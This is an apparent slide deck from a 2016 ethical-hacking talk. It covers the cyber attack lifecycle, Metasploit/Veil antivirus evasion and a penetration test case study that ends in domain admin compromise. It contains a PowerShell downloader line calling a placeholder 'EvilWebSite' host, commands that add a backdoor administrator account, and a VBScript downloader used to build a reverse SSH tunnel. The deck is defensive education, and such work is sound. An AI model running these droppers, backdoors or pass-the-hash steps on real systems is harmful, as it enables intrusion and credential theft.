Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016

DIGITAL SECURITY FRONTLINE
Cyber Security
Attack Methodologies

Agenda
• Objectives
• Introduction
• Cyber Attack Lifecycle
• Vulnerabilities and Exploitation
• Example of a penetration test scenario
• Conclusion

Objectives
 Get insights on the methodologies used during a Cyber Attack
 Understand how hackers penetrate a network, elevate their
privileges, maintain persistence and hide their malicious
activities
 Show hands-on:
 Provide a concrete example using Metasploit tool
 Show a Demo in real time
 Deep dive into a real life pentesting exercise
 Understand what can be done to protect against cyber attacks

Introduction
 Frédéric De Pauw
 Co-Founder / Offensive Security @Avanguard
 Ethical Hacker
Head IT Security @Ethias
Freelance Ethical Hacker (BE – LUX – US)
https://be.linkedin.com/in/fdepauw

Introduction
 What is Cyber Crime?
 Computer crime, or cybercrime, is crime that involves a
computer and a network
 Two types of Cyber Crime:
Technology is the Target. Enterprise, State systems,
personal systems
Technology is the Instrument. Criminal activities on
Internet
 This session is focused on the first type

Introduction
Technology = Target Technology = instrument
Distributed Deny of Service Pedopornography
Hacking incitement to racial hatred
Malwares, Ransomwares Incitement to terrorism
Phishing Money Laundering
Hacktivism Drug sell
… Spam
…

Introduction Cyber Crime
 Drastically evolved over the past years, following the global evolution of ICT
supporting human activity
 Allow cyber criminals to make profit equivalent as other types of criminality
 Offers some advantages over other criminal activities: anonymity, discretion,
borderless
 Remain little fought and with no international legislation
 Has evolved to cyber war with state-sponsored attacks
 Will affect our life (connected cars, Operational Technologies, IOT)
 Cost of Cyber Crime in Belgium: 3,5 billion Euros

Introduction
• Evolution of Cyber Crime
S
O
P
H
I
S
T
I
C
A
T
I
O
N
1985-1995
Entertainment
First Worms
Phone Hacking
2010-2016-…
Hacktivism
Virus Spread
Website Defacement
Organized Crime
DDOS
Company Systems Hacking
Data Lead
Industrial espionage
Cyber War
Targeted Attacks
State-Sponsored Attacks

Introduction
 Future of Cyber Crime
 Intensification of targeted cyber attacks against enterprises with important impacts
(financial, image..)
 Predominance of Advanced Persistence Threats targeting the end user
 Intensification of cyber war / cyber espionage activities between nations
 Increase of cyber crime targeting connected objects and operational technologies
 Hacking of a plane - 2015
 Hacking of a pacemaker - 2013
 Cars hacking - 2015

Introduction
 Legal evolution
 General Data Protection Regulation (GDPR) – adopted end of 2016 –
comes into force 25 may 2018
Circulars of National Bank of Belgium
 Regulation for financial sector
 Data Breach notification standard
 Within 72 hours
 Fines in case of data leak
Max 4% of turnover, maximum 20 M€

Cyber Attack Lifecycle
- Public Information
- Social Networks
- Vulnerability Scanning
- Physical Observation
1 Reconnaissance 2 Initial Infection
- Vulnerabilities
- Virus / Malware
- Social Engineering
- Physical Intrusion
3 Gain Control 4 Privilege Escalation
Control infected system
5 Lateral Movement
Compromise more systems
deeper in the network
7 Malicious Activities
Data Exfiltration
Hacking Websites
Money Extortion
..Gain elevated privileges on the
infected system
6 Persistence
Maintain persistent connection
with infected systems

> Reconnaissance
 Reconnaissance process is a key activity
 Indeed, during this phase crucial information are obtained in order to
perform a cyber attack
 For instance, information will be used to determined the best attack vector
to be used
 Activities performed are:
 Collect information concerning the target (websites, telephone numbers,
general mailboxes..) through public information
 Collect information through direct contact sur as phone calls (fake poll, job
seeker..)
 Collect technical information concerning the target information system
(exposed systems, partners, data centers..)
 Collect information on premises (garbage, WIFI scanning..)
 Actively scan enterprise networks exposed on Internet

> Reconnaissance
Commercial Tool: Maltego
Free Tools (Kali Linux):
• recon-ng
• DMItry
• theharvester

> Reconnaissance
Wifi Reconnaissance and Hacking tools from hakshop.com

> Reconnaissance
 Following reconnaissance activities, attackers must have obtained enough information
in order to determine best attack vectors in order to perform the initial infection phase
 For instance:
 Vulnerabilities infecting systems exposed on Internet
 Lack of physical access to facilities
 Social engineering attack on selected profiles from, for instance, social networks information

> Initial Infection
 Initial Infection is aimed at obtaining a first backdoor within the target
information system
 Vectors:
 Exploiting a vulnerability affecting the victim’s system(s)
 Infection through Virus / Malware
 Exploiting a physical vulnerability
 Installing rogue access points or devices

> Initial Infection
PerimeterPublic Cloud
Private Cloud Corporate Network
On Prem Applications
Servers / Appliances
Security Technology
SAAS Applications
Security Technology
Corporate Applications
Security Technology
Corporate Applications
Security Technology
End Users

> Initial Infection
Lan Turtle from Hakshop
https://youtu.be/l8YpTOv7Q2A

> Initial Infection
 IDS/IPS Bypass
 Encryption
 Anti-Virus Bypass
 Use simple Powershell as a dropper which fetches an encrypted payload
over Internet
powershell.exe "IEX ((new-object
net.webclient).downloadstring('http://EvilWebSite/payload.txt '))
 Unknown Viruses
 Use Staging to decouple payload from initial dropper.
The dropper is injected directly into memory
 Firewall Bypass
 Uses “reverse” connections which connect to the C&C
 E.g. HTTPS passing through the Enterprise Proxy

> Initial Infection
 Free tool for malware code obfuscation
 VEIL Evasion Framework
 Generate obfuscated payload using several methodologies
 Metasploit Meterpreter payloads
 Generate payloads from different sources
 C/C++ shellcode
 Powershell shellcode
 Python shellcode

> Initial Infection
 Metasploit + Veil framework
 Create a Meterpreter backdoor obfuscated with VEIL
 Powershell type

> Initial Infection
 Metasploit + VEIL Framework
 Create a Meterpreter backdoor using VEIL for Antivirus Avoidance
 Embed the Virus in a Word Macro, or create a .bat, include payload
or fetch the payload on a Web Server

> Initial Infection

> Initial Infection
 Start the Listener on Metasploit
More during the Demo

> Gain Control
 Once initial infection is performed, the objective is to get control
over the machine.
 For this a network connection must be established between the
victim and the Command & Control Server
 In general « reverse » connection is made to bypass inbound
Firewall protection
 Several techniques to bypass Outbound filtering (if present.)

> Gain Control
 Standard Enterprise security principles for Outbound filtering:
 Default policy is to deny all outbound connections
 Allowed outbound connections must go through a proxy
 Outbound connections must conform to the expected protocol
 Outbound connections must pass other checks as well.
 Outbound filtering evasion techniques examples
 Reverse HTTP and / or HTTPS traffic (without or with Proxy settings
verification
 Payload Staging over DNS by setting the payload into TXT Records of a
Domain

> Gain Control
 Metasploit / Meterpreter
 Meterpreter is an advanced, dynamically extensible payload that
uses in-memory DLL injection stagers and is extended over the
network at runtime. It communicates over the stager socket and
provides a comprehensive client-side Ruby API. It features
command history, tab completion, channels, and more.

> Privilege Escalation
 Escalate privileges from infected machines in order gain elevated access
 Typical example is getting Administrator or System privileges
 Several techniques
 « Local Exploits » from local applications on the infected machine
 Manual search for credentials in scripts
 Password Hashes dump (e.g. SAM, /etc/passwd) and cracking
 Authenticated Sessions grabbing (e.g. VPN Sessions)
 SSH Keys
 World Writeable files
 Read command history files
 Batches / Jobs alteration
 Process Injection
 Try injecting malicious code in processes running under « Domain Admin » privileged user

> Privilege Escalation
 Metasploit: « Incognito » module
 Allows to impersonate authentication tokens on compromised windows hosts
 Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see
interesting authentication tokens
 TIP: File servers are virtual treasure troves of tokens since most file servers are used
as network attached drives via domain logon scripts

> Lateral Movement
 From Infected systems, try to infect more systems deeper in the
Network
 Basically repeat the cyber Attack Lifecycle process (recon, initial
infection, privilege escalation…)
 Aim for high value systems, windows domain controllers, file servers..
 Techniques
 Credential re-use / pass-the-hash / SSH keys re-use
 Internal applications vulnerabilities (less often patched)
 Network segmentation issues between environments ( e.g. Port 445) – PsExec
with Pass-The-Hash

> Lateral Movement
 Metasploit – Pivoting technique
 Basically using the first compromise to allow and even aid in the
compromise of other otherwise inaccessible systems

> Lateral Movement
 Use Autoroute to make the compromised host a pivot to other
networks

> Lateral Movement
 Scan the network through the route created on ports 139 & 445

> Lateral Movement
 Start a new session on a new host using PsExec and “Pass-The-Hash”
technique re-using local Administrator password hash

> Maintain Persistence
 Prevent loss of connection between infected machines and the C&C
 Techniques
 Create jobs / schedule tasks
 Create service running on startup
 Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
 Bootkit / Rootkit
 Default file association
 Logon Scripts
 Modification of Applications / Services
 Registry RUN keys

> Maintain Persistence
 Metasploit / Persistence module
 Create a Meterpreter service which will start when the
compromised host boots

> Demo
 Social Engineering scenario
 Send a « Virus » to the victim which consists of a Metasploit
Meterpreter instance
 Undetected by up to date commercial antivirus
1. Prepare Malware
& environment
2. Send Malware
3. Execute Malware
4. Get infected & Contact C&C
5. Interact

Vulnerabilities and
Exploitation

Vulnerabilities and Exploitation
 A vulnerability is a flaw in a system which allows a malicious user to compromise its
Confidentiality, Integrity and / or its availability
 Simple – Default Password. Complex – Buffer Overflow in an application
 Dozens of new vulnerabilities officially classified everyday
 http://www.cvedetails.com
 Dozen of others are not disclosed!
 0DAY – Vulnerabilities not discovered, or not disclosed
 Vulnerabilities are discovered by
 Researchers, students (Ethical Hackers)
 Professional researchers ( Vulnerability Brokers )
 http://www.zerodayinitiative.com/
 France- Vupen Security – Sells vulnerabilities to NASA
 Cyber Criminals( 0DAYS )

 Full Disclosure principle
 Vulnerabilities are reported and published publicly as soon as discovered without taking
into account that a patch is available
 Responsible disclosure principle
 Vendors are notified first
 Vulnerability is publicly disclosed after 45 days
 Websites with vulnerabilities and associated exploits
 www.securityfocus.com
 www.1337day.com (not free)
 http://www.cvedetails.com/
 http://www.exploit-db.com/
 Underground Websites on TOR network
 Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR)
ccc.de (ALL), blackhat.com (US)

 Complexity of systems, applicative codes, communication flows, network
segmentation
 Out-of-the-box vulnerabilities of Vendor solutions, lack of security
configuration
 Next->Next->Next Syndrome
 Lack of secure coding awareness
 TOP 10 OWASP
 Lack of enforcement for Security during IT Projects
 Security implies Cost and Time
 Need for functionality <-> Need for security
 BlackList Mode
 Learning Mode

Penetration test example
• Context: Black Box Intrusion test. Scope: External-facing
systems
Web Servers
Ports 80 (HTTP) et 443
(HTTPS)
DMZ Intranet
Domaine Windows
d’EntrepriseInternal Network

• VULN 1/2: Vulnerable deployment of SAP BO ( Apache
Axis2 )
• CVE-2010-0219 , Apache Axis2 Default Credentials
• http://www.securityfocus.com/bid/40343 , Apache Axis2
Directory traversal
• See earlier:
• Vuln « Directory Traversal »
• Vuln « Default Password »
• Allows to have admin credentials to Axis2

• Access to Axis2 administration allows to upload a Web
Service and hot deployment of it

• A metasploit module exists to exploit this vuln Axis2 / SAP BusinessObjects
Authenticated Code Execution
• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
• We use it to deploy a reverse shell backdoor on the server to connect back to
port 80
• VULN 3: Servers is allowed to contact any host on Internet on port 80 and 443
Web Servers
(HTTPS)
DMZ Intranet
Domaine Windows
d’Entreprise
C&C SERVER – PORT 80
Port 80
Internal Network

• Not possible to upload a meterpreter (killed by AV on the machine)
• Possible to upload a backdoor which sends me back a DOS
command prompt on the server

• Next steps:
• Create privileged account on the server
• VULN 4: Application server is running under ADMIN privileges
• Net user temptest password /add
• Net localgroup Administrators hacked /add
• Obtain a Remote Desktop connection
• Problem: Port 3389 closed Inbound
• Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
Web ServersC&C SERVER – PORT 80
Port 3389
SSH SERVER – PORT 443
Reverse SSH TUNNEL / Port
443

• To create the tunnel, I need to download a SSH Client on
the Server using DOS command prompt
• I create a VBSCRIPT script using « Echo » command, then
execute the VBSCRIPT
• Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
• Cscript dl.vbs
• Use plink to create the tunnel
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.putty.com/plink.exe", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "c:tempplink.exe", 2 '//overwrite
end with

Port 3389
443
 Connect to RDP through the tunnel and use the user account I just
created to connect
temptest
password

 Next Step -> Lateral Movement – the simplest first, credentials
reuse
 I need to crack all passwords present locally on the infected server
 Vuln 6/7: Windows 2003 Design Vulnerabilities
 VULN 6: « Repair » file contains a SAM backup file containing encrypted
credentials using LMHASH
 VULN: LMHASH encryption algorithm is broken and can be cracked
easily

 After some minutes

 VULN 8: Local Administrator password is replicated over all systems
in the DMZ
Port 3389
443 Web Servers
Web Servers
Web Servers
Port 3389

 Next-Step: Try to hit Internal Network
 VULN 9 : DMZ Systems members of Internal Windows Domain. Means that
critical ports ( e.g. 139, 445, … ) must be open between DMZ and Internal
network
 VULN 10 : Password Replication Bis – A Domain Admin user account whose
name is identical has a local account has the same password

 I connect to the Domain Controller from the DMZ using the Domain
Admin account. I am now Domain Administrator and has full control
over the Enterprise Domain
Web Servers
(HTTPS)
DMZ Intranet
Domaine Windows
d’Entreprise
Contrôleur de Domaine
Domain Controller

Conclusion
 Cyber Crime will continue to be a major threat for enterprises for the next
years
 Computer Vulnerabilities will continue to be discovered and will continue
to affect enterprises
 Legacy technologies such as standard AV are no longer sufficient to protect
against cyber threats
 Operational IT Security programs must address security incident response
and must address each of the following:
 Awareness
 Preventive security
 Detective security
 Corrective security

Conclusion
 [Personal Statement] Be careful with the notion of Risk-Based Security,
based on asset classification
 Should less critical systems be given less attention in terms of security?
 If a Hacker can compromise a system in non critical zone and obtain credentials that are re-used in
other zones? If the enterprise does not have one Windows Domain per Risk Domain?
 Use Risk-Based security only if you have a full IT isolation… even thou is that enough?
 Awareness
 Educate all your employees to emergent cyber threats
 Make real social-engineering exercises, with sending undetected Viruses to your employees
 Be careful to human reaction
 Educate but also protect colleagues who will be infected during the exercise

Conclusion
 Preventive Security
 Sandboxing technologies must be implemented in parallel with standard signature-based AV to protect against
APTs
 Implement NAC
 Identify your vulnerabilities before the hackers
 Network security must be governed: network segmentation policies, firewall rules governance, flow and
application control, inbound and outbound traffic policies..
 High Privileges Management
 Isolation of network tiers
 Use hardening best practices
 E.g. Remove admin rights from end users and from applications (least privilege)
 Implement correct Windows security settings

Conclusion
 Detective security
 Real-time correlation of technical use cases has a real added-value
 Monitor for accounts creation on any system
 Monitor any “Domain Admin” privilege elevation
 Monitor for internal scans
 Monitor authentication failures
 Monitor denied outbound traffic
 Corrective Security
 Have emergency security procedures for containment defined and tested
 Have a security incident response plan
 Have a patching policy

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016

Similar to Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016 (20)

Recently uploaded

Recently uploaded (20)

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Decembre 2016